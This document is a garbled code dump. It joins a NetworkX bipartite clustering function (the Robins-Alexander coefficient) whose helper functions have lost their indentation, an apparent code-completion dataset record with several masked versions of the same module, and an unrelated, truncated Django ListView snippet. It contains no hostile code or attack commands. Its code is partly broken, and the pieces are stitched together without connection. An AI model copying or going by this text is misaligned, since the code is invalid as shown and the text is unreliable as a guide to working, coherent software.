    r"""Compute the bipartite clustering of G.

    Robins and Alexander [1]_ defined the bipartite clustering
    coefficient as four times the number of four cycles `C_4` divided
    by the number of three paths `L_3` in a bipartite graph:

    .. math::

       CC_4 = \frac{4 * C_4}{L_3}

    Parameters
    ----------
    G : graph
        A bipartite graph.

    Returns
    -------
    clustering : float
        The Robins and Alexander bipartite clustering for the input graph.

    Examples
    --------
    >>> from networkx.algorithms import bipartite
    >>> G = nx.davis_southern_women_graph()
    >>> print(round(bipartite.robins_alexander_clustering(G), 3))
    0.468

    See Also
    --------
    latapy_clustering
    square_clustering

    References
    ----------
    .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
       directors: Network structure and distance in bipartite graphs.
       Computational & Mathematical Organization Theory 10(1), 69–94.
    """
    # Graphs this small cannot contain a three path, let alone a four cycle.
    if G.order() < 4 or G.size() < 3:
        return 0
    three_paths = _threepaths(G)
    # Guard the division: no three paths means the coefficient is zero.
    if three_paths == 0:
        return 0
    return 4.0 * _four_cycles(G) / three_paths
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in set(G[u]) - set([v]):
paths += len(set(G[w]) - set([v, u]))
# Divide by two because we count each three path twice
# one for each possible starting point
return paths / 2
|
flexible
|
{
"blob_id": "a21c132ba9f24ff2c695bf66cae074705025d6b1",
"index": 8063,
"step-1": "<mask token>\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\n<mask token>\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\\\frac{1}{n}\\\\sum_{v \\\\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\\\frac{1}{|X|}\\\\sum_{v \\\\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. \n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. 
[1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n \"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. math::\n\n CC_4 = \\\\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return 4.0 * C_4 / L_3\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\ndef cc_min(nu, nv):\n return float(len(nu & nv)) / min(len(nu), len(nv))\n\n\n<mask token>\n\n\ndef latapy_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute a bipartite clustering coefficient for nodes.\n\n The bipartie clustering coefficient is a measure of local density\n of connections defined as [1]_:\n\n .. math::\n\n c_u = \\\\frac{\\\\sum_{v \\\\in N(N(u))} c_{uv} }{|N(N(u))|}\n\n where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`, \n and `c_{uv}` is the pairwise clustering coefficient between nodes \n `u` and `v`.\n\n The mode selects the function for `c_{uv}` which can be:\n\n `dot`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{|N(u) \\\\cup N(v)|}\n\n `min`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{min(|N(u)|,|N(v)|)}\n\n `max`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{max(|N(u)|,|N(v)|)}\n\n\n Parameters\n ----------\n G : graph\n A bipartite graph\n\n nodes : list or iterable (optional)\n Compute bipartite clustering for these nodes. The default \n is all nodes in G.\n\n mode : string\n The pariwise bipartite clustering method to be used in the computation.\n It must be \"dot\", \"max\", or \"min\". \n\n Returns\n -------\n clustering : dictionary\n A dictionary keyed by node with the clustering coefficient value.\n\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.path_graph(4) # path graphs are bipartite\n >>> c = bipartite.clustering(G) \n >>> c[0]\n 0.5\n >>> c = bipartite.clustering(G,mode='min') \n >>> c[0]\n 1.0\n\n See Also\n --------\n robins_alexander_clustering\n square_clustering\n average_clustering\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. 
\n Social Networks 30(1), 31--48.\n \"\"\"\n if not nx.algorithms.bipartite.is_bipartite(G):\n raise nx.NetworkXError('Graph is not bipartite')\n try:\n cc_func = modes[mode]\n except KeyError:\n raise nx.NetworkXError(\n 'Mode for bipartite clustering must be: dot, min or max')\n if nodes is None:\n nodes = G\n ccs = {}\n for v in nodes:\n cc = 0.0\n nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])\n for u in nbrs2:\n cc += cc_func(set(G[u]), set(G[v]))\n if cc > 0.0:\n cc /= len(nbrs2)\n ccs[v] = cc\n return ccs\n\n\n<mask token>\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\\\frac{1}{n}\\\\sum_{v \\\\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\\\frac{1}{|X|}\\\\sum_{v \\\\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. 
\n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n \"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. 
math::\n\n CC_4 = \\\\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return 4.0 * C_4 / L_3\n\n\ndef _four_cycles(G):\n cycles = 0\n for v in G:\n for u, w in itertools.combinations(G[v], 2):\n cycles += len((set(G[u]) & set(G[w])) - set([v]))\n return cycles / 4\n\n\ndef _threepaths(G):\n paths = 0\n for v in G:\n for u in G[v]:\n for w in (set(G[u]) - set([v])):\n paths += len(set(G[w]) - set([v, u]))\n return paths / 2\n",
"step-3": "<mask token>\n__author__ = '\\n'.join(['Jordi Torrents <jtorrents@milnou.net>',\n 'Aric Hagberg (hagberg@lanl.gov)'])\n__all__ = ['clustering', 'average_clustering', 'latapy_clustering',\n 'robins_alexander_clustering']\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\ndef cc_min(nu, nv):\n return float(len(nu & nv)) / min(len(nu), len(nv))\n\n\nmodes = {'dot': cc_dot, 'min': cc_min, 'max': cc_max}\n\n\ndef latapy_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute a bipartite clustering coefficient for nodes.\n\n The bipartie clustering coefficient is a measure of local density\n of connections defined as [1]_:\n\n .. math::\n\n c_u = \\\\frac{\\\\sum_{v \\\\in N(N(u))} c_{uv} }{|N(N(u))|}\n\n where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`, \n and `c_{uv}` is the pairwise clustering coefficient between nodes \n `u` and `v`.\n\n The mode selects the function for `c_{uv}` which can be:\n\n `dot`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{|N(u) \\\\cup N(v)|}\n\n `min`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{min(|N(u)|,|N(v)|)}\n\n `max`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{max(|N(u)|,|N(v)|)}\n\n\n Parameters\n ----------\n G : graph\n A bipartite graph\n\n nodes : list or iterable (optional)\n Compute bipartite clustering for these nodes. The default \n is all nodes in G.\n\n mode : string\n The pariwise bipartite clustering method to be used in the computation.\n It must be \"dot\", \"max\", or \"min\". 
\n\n Returns\n -------\n clustering : dictionary\n A dictionary keyed by node with the clustering coefficient value.\n\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.path_graph(4) # path graphs are bipartite\n >>> c = bipartite.clustering(G) \n >>> c[0]\n 0.5\n >>> c = bipartite.clustering(G,mode='min') \n >>> c[0]\n 1.0\n\n See Also\n --------\n robins_alexander_clustering\n square_clustering\n average_clustering\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if not nx.algorithms.bipartite.is_bipartite(G):\n raise nx.NetworkXError('Graph is not bipartite')\n try:\n cc_func = modes[mode]\n except KeyError:\n raise nx.NetworkXError(\n 'Mode for bipartite clustering must be: dot, min or max')\n if nodes is None:\n nodes = G\n ccs = {}\n for v in nodes:\n cc = 0.0\n nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])\n for u in nbrs2:\n cc += cc_func(set(G[u]), set(G[v]))\n if cc > 0.0:\n cc /= len(nbrs2)\n ccs[v] = cc\n return ccs\n\n\nclustering = latapy_clustering\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\\\frac{1}{n}\\\\sum_{v \\\\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\\\frac{1}{|X|}\\\\sum_{v \\\\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. 
\n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n \"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. 
math::\n\n CC_4 = \\\\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return 4.0 * C_4 / L_3\n\n\ndef _four_cycles(G):\n cycles = 0\n for v in G:\n for u, w in itertools.combinations(G[v], 2):\n cycles += len((set(G[u]) & set(G[w])) - set([v]))\n return cycles / 4\n\n\ndef _threepaths(G):\n paths = 0\n for v in G:\n for u in G[v]:\n for w in (set(G[u]) - set([v])):\n paths += len(set(G[w]) - set([v, u]))\n return paths / 2\n",
"step-4": "import itertools\nimport networkx as nx\n__author__ = '\\n'.join(['Jordi Torrents <jtorrents@milnou.net>',\n 'Aric Hagberg (hagberg@lanl.gov)'])\n__all__ = ['clustering', 'average_clustering', 'latapy_clustering',\n 'robins_alexander_clustering']\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\ndef cc_min(nu, nv):\n return float(len(nu & nv)) / min(len(nu), len(nv))\n\n\nmodes = {'dot': cc_dot, 'min': cc_min, 'max': cc_max}\n\n\ndef latapy_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute a bipartite clustering coefficient for nodes.\n\n The bipartie clustering coefficient is a measure of local density\n of connections defined as [1]_:\n\n .. math::\n\n c_u = \\\\frac{\\\\sum_{v \\\\in N(N(u))} c_{uv} }{|N(N(u))|}\n\n where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`, \n and `c_{uv}` is the pairwise clustering coefficient between nodes \n `u` and `v`.\n\n The mode selects the function for `c_{uv}` which can be:\n\n `dot`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{|N(u) \\\\cup N(v)|}\n\n `min`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{min(|N(u)|,|N(v)|)}\n\n `max`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{max(|N(u)|,|N(v)|)}\n\n\n Parameters\n ----------\n G : graph\n A bipartite graph\n\n nodes : list or iterable (optional)\n Compute bipartite clustering for these nodes. The default \n is all nodes in G.\n\n mode : string\n The pariwise bipartite clustering method to be used in the computation.\n It must be \"dot\", \"max\", or \"min\". 
\n\n Returns\n -------\n clustering : dictionary\n A dictionary keyed by node with the clustering coefficient value.\n\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.path_graph(4) # path graphs are bipartite\n >>> c = bipartite.clustering(G) \n >>> c[0]\n 0.5\n >>> c = bipartite.clustering(G,mode='min') \n >>> c[0]\n 1.0\n\n See Also\n --------\n robins_alexander_clustering\n square_clustering\n average_clustering\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if not nx.algorithms.bipartite.is_bipartite(G):\n raise nx.NetworkXError('Graph is not bipartite')\n try:\n cc_func = modes[mode]\n except KeyError:\n raise nx.NetworkXError(\n 'Mode for bipartite clustering must be: dot, min or max')\n if nodes is None:\n nodes = G\n ccs = {}\n for v in nodes:\n cc = 0.0\n nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])\n for u in nbrs2:\n cc += cc_func(set(G[u]), set(G[v]))\n if cc > 0.0:\n cc /= len(nbrs2)\n ccs[v] = cc\n return ccs\n\n\nclustering = latapy_clustering\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\\\frac{1}{n}\\\\sum_{v \\\\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\\\frac{1}{|X|}\\\\sum_{v \\\\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. 
\n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n \"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. 
math::\n\n CC_4 = \\\\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return 4.0 * C_4 / L_3\n\n\ndef _four_cycles(G):\n cycles = 0\n for v in G:\n for u, w in itertools.combinations(G[v], 2):\n cycles += len((set(G[u]) & set(G[w])) - set([v]))\n return cycles / 4\n\n\ndef _threepaths(G):\n paths = 0\n for v in G:\n for u in G[v]:\n for w in (set(G[u]) - set([v])):\n paths += len(set(G[w]) - set([v, u]))\n return paths / 2\n",
"step-5": "#-*- coding: utf-8 -*-\n# Copyright (C) 2011 by\n# Jordi Torrents <jtorrents@milnou.net>\n# Aric Hagberg <hagberg@lanl.gov>\n# All rights reserved.\n# BSD license.\nimport itertools\nimport networkx as nx\n__author__ = \"\"\"\\n\"\"\".join(['Jordi Torrents <jtorrents@milnou.net>',\n 'Aric Hagberg (hagberg@lanl.gov)'])\n__all__ = ['clustering',\n 'average_clustering',\n 'latapy_clustering',\n 'robins_alexander_clustering']\n\n# functions for computing clustering of pairs\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\ndef cc_min(nu, nv):\n return float(len(nu & nv)) / min(len(nu), len(nv))\n\n\nmodes = {'dot': cc_dot,\n 'min': cc_min,\n 'max': cc_max}\n\n\ndef latapy_clustering(G, nodes=None, mode='dot'):\n r\"\"\"Compute a bipartite clustering coefficient for nodes.\n\n The bipartie clustering coefficient is a measure of local density\n of connections defined as [1]_:\n\n .. math::\n\n c_u = \\frac{\\sum_{v \\in N(N(u))} c_{uv} }{|N(N(u))|}\n\n where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`, \n and `c_{uv}` is the pairwise clustering coefficient between nodes \n `u` and `v`.\n\n The mode selects the function for `c_{uv}` which can be:\n\n `dot`: \n\n .. math::\n\n c_{uv}=\\frac{|N(u)\\cap N(v)|}{|N(u) \\cup N(v)|}\n\n `min`: \n\n .. math::\n\n c_{uv}=\\frac{|N(u)\\cap N(v)|}{min(|N(u)|,|N(v)|)}\n\n `max`: \n\n .. math::\n\n c_{uv}=\\frac{|N(u)\\cap N(v)|}{max(|N(u)|,|N(v)|)}\n\n\n Parameters\n ----------\n G : graph\n A bipartite graph\n\n nodes : list or iterable (optional)\n Compute bipartite clustering for these nodes. The default \n is all nodes in G.\n\n mode : string\n The pariwise bipartite clustering method to be used in the computation.\n It must be \"dot\", \"max\", or \"min\". 
\n\n Returns\n -------\n clustering : dictionary\n A dictionary keyed by node with the clustering coefficient value.\n\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.path_graph(4) # path graphs are bipartite\n >>> c = bipartite.clustering(G) \n >>> c[0]\n 0.5\n >>> c = bipartite.clustering(G,mode='min') \n >>> c[0]\n 1.0\n\n See Also\n --------\n robins_alexander_clustering\n square_clustering\n average_clustering\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if not nx.algorithms.bipartite.is_bipartite(G):\n raise nx.NetworkXError(\"Graph is not bipartite\")\n\n try:\n cc_func = modes[mode]\n except KeyError:\n raise nx.NetworkXError(\n \"Mode for bipartite clustering must be: dot, min or max\")\n\n if nodes is None:\n nodes = G\n ccs = {}\n for v in nodes:\n cc = 0.0\n nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])\n for u in nbrs2:\n cc += cc_func(set(G[u]), set(G[v]))\n if cc > 0.0: # len(nbrs2)>0\n cc /= len(nbrs2)\n ccs[v] = cc\n return ccs\n\n\nclustering = latapy_clustering\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n r\"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\frac{1}{n}\\sum_{v \\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. 
\n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n r\"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. 
math::\n\n CC_4 = \\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return (4. * C_4) / L_3\n\n\ndef _four_cycles(G):\n cycles = 0\n for v in G:\n for u, w in itertools.combinations(G[v], 2):\n cycles += len((set(G[u]) & set(G[w])) - set([v]))\n return cycles / 4\n\n\ndef _threepaths(G):\n paths = 0\n for v in G:\n for u in G[v]:\n for w in set(G[u]) - set([v]):\n paths += len(set(G[w]) - set([v, u]))\n # Divide by two because we count each three path twice\n # one for each possible starting point\n return paths / 2\n",
"step-ids": [
4,
8,
9,
10,
11
]
}
|
[
4,
8,
9,
10,
11
] |
from django.urls import reverse_lazy
from django.views.generic import (
ListView,
DetailView,
CreateView,
UpdateView,
DeleteView,
)
from .models import Entry
class EntryListView(ListView):
    # List every Entry, newest first.  ``objects.order_by`` is equivalent
    # to ``objects.all().order_by`` — the manager delegates to a queryset.
    model = Entry
